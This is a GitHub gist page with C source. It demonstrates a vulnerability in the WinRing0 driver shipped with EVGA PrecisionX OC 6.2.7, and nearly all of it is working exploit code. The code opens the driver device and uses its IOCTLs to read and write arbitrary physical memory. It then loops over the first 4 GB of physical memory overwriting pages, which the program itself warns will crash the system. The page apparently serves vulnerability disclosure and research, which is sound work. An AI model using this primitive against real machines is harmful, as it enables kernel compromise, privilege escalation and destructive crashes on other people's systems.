Created
January 29, 2020 17:54
-
-
Save hfiref0x/15e2e9640df0a44b9c0163d52bc3e6bf to your computer and use it in GitHub Desktop.
EVGA PrecisionX OC 6.2.7 wormhole driver
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <cstdio> | |
#define DEVICE_WR0_TYPE 40000 | |
#define WR0_DEVICE_LINK TEXT("\\\\.\\WinRing0_1_2_0") | |
HANDLE g_handleWR0 = INVALID_HANDLE_VALUE; | |
#define IOCTL_WR0_READ_MEMORY CTL_CODE(DEVICE_WR0_TYPE, 0x841, METHOD_BUFFERED, FILE_READ_ACCESS) | |
#define IOCTL_WR0_WRITE_MEMORY CTL_CODE(DEVICE_WR0_TYPE, 0x842, METHOD_BUFFERED, FILE_WRITE_ACCESS) | |
typedef struct _WR0_READ_MEMORY_INPUT { | |
ULARGE_INTEGER Address; | |
ULONG UnitSize; | |
ULONG Count; | |
} WR0_READ_MEMORY_INPUT, *PWR0_READ_MEMORY_INPUT; | |
typedef struct _WR0_WRITE_MEMORY_INPUT { | |
ULARGE_INTEGER Address; | |
ULONG UnitSize; | |
ULONG Count; | |
UCHAR Data[1]; | |
} WR0_WRITE_MEMORY_INPUT, *PWR0_WRITE_MEMORY_INPUT; | |
BOOL ReadPhysicalMemory( | |
_In_ ULONG_PTR PhysicalAddress, | |
_In_ PBYTE Buffer, | |
_In_ ULONG Count, | |
_In_ ULONG UnitSize, | |
_Out_ ULONG *BytesRead | |
) | |
{ | |
WR0_READ_MEMORY_INPUT request; | |
*BytesRead = 0; | |
request.Address.QuadPart = PhysicalAddress; | |
request.UnitSize = UnitSize; | |
request.Count = Count; | |
ULONG numberOfBytes = request.UnitSize * request.Count; | |
ULONG bytesIO; | |
if (DeviceIoControl( | |
g_handleWR0, | |
IOCTL_WR0_READ_MEMORY, | |
&request, | |
sizeof(WR0_READ_MEMORY_INPUT), | |
Buffer, | |
numberOfBytes, | |
&bytesIO, | |
NULL)) | |
{ | |
*BytesRead = bytesIO; | |
return TRUE; | |
} | |
return FALSE; | |
} | |
BOOL WritePhysicalMemory( | |
_In_ ULONG_PTR PhysicalAddress, | |
_In_ PBYTE Buffer, | |
_In_ ULONG Count, | |
_In_ ULONG UnitSize, | |
_Out_ ULONG* BytesWritten | |
) | |
{ | |
WR0_WRITE_MEMORY_INPUT *request; | |
*BytesWritten = 0; | |
ULONG numberOfBytes = FIELD_OFFSET(WR0_WRITE_MEMORY_INPUT, Data) + Count * UnitSize; | |
request = (WR0_WRITE_MEMORY_INPUT*)VirtualAlloc(NULL, | |
(SIZE_T)numberOfBytes, | |
MEM_COMMIT | MEM_RESERVE, | |
PAGE_READWRITE); | |
if (request == NULL) | |
return FALSE; | |
request->Address.QuadPart = PhysicalAddress; | |
request->Count = Count; | |
request->UnitSize = UnitSize; | |
RtlCopyMemory(request->Data, Buffer, Count * UnitSize); | |
ULONG bytesIO; | |
BOOL bResult = FALSE; | |
bResult = DeviceIoControl( | |
g_handleWR0, | |
IOCTL_WR0_WRITE_MEMORY, | |
request, | |
numberOfBytes, | |
NULL, | |
0, | |
&bytesIO, | |
NULL); | |
if (bResult) { | |
*BytesWritten = bytesIO; | |
} | |
VirtualFree(request, 0, MEM_RELEASE); | |
return bResult; | |
} | |
BOOLEAN InitDriver() | |
{ | |
g_handleWR0 = CreateFile(WR0_DEVICE_LINK, | |
GENERIC_READ | GENERIC_WRITE, | |
0, | |
NULL, | |
OPEN_EXISTING, | |
0, | |
NULL); | |
if (g_handleWR0 == INVALID_HANDLE_VALUE) { | |
printf_s("[!] Unable to open device\r\n"); | |
return FALSE; | |
} | |
return TRUE; | |
} | |
int Demo3() | |
{ | |
printf_s("EVGA PrecisionX OC 6.2.7 Arbitrary physical memory read/write demo\r\n"); | |
ULONG bytesIO = 0; | |
UCHAR Buffer[4096]; | |
RtlSecureZeroMemory(&Buffer, sizeof(Buffer)); | |
ReadPhysicalMemory(0x30000000, | |
(PBYTE)&Buffer, | |
4096, | |
1, | |
&bytesIO); | |
printf_s("Arbitrary physical memory write demo\r\n"); | |
printf_s("This will crash system\r\n"); | |
system("pause"); | |
ULONG_PTR Data = 0xFFFFABCDFFFFABCD; | |
for (ULONG i = 0; i < 0xFFFFFFFF; i += 0x1000) { | |
WritePhysicalMemory(i, | |
(PBYTE)&Data, | |
sizeof(ULONG_PTR), | |
1, | |
&bytesIO); | |
} | |
// | |
// Never here | |
// | |
CloseHandle(g_handleWR0); | |
return 0; | |
} | |
int main() | |
{ | |
if (!InitDriver()) | |
return -1; | |
return Demo3(); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment